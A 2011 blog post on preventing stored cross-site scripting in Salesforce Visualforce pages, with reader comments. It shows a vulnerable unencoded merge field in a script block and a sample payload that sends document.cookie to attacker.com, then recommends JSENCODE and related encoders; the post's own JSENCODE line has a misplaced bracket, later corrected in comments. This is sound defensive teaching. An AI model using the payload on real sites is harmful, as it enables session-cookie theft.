Tuesday, 1 March 2011

Salesforce applications with security : Stored XSS

Continuing to my previous post , this time I would to share the knowledge on Stored XSS part.
So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.

In other words :
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."

Let's have an example:

function crossXSS()
var xssExample = '{!Account.Name}' ;
<apex:commandLink value="Click me" onClick="crossXSS();" />

Now suppose
Account Name is :  testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So this account name will always be on the page in script block and whenever the commandLink will be clicked "crossXSS" will be called and will be in the following manner:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So again you can see here all the cookies will be sent to the attackers.com site.

What I suggested in previous blog , repeating all those things again :).

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE(Account.Name})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.


  1. var xssExample = '{!JSENCODE(Account.Name})' ;
    Invalid argument!!!!!!
    how to encode, i tried all the ways

  2. Hi Amit, your order of closing bracket is wrong.
    Try with {!JSENCODE(Account.Name)}

  3. Hi I am using this to read the parameter.
    Before Passing to URL I Encode the parameter using JSENCODE in the javascript function

    The following line in controller reads the parameter

    String temp = System.currentPageReference().getParameters().get('Amt');
    is there a risk?


  4. Hi Srikanta M,

    There is no risk at all but if you want use this variable in a dynamic query then you need to "escapeSingleQuotes" like String.escapeSingleQuotes(temp) before using in dynamic SOQL.

    Deepak Choudhary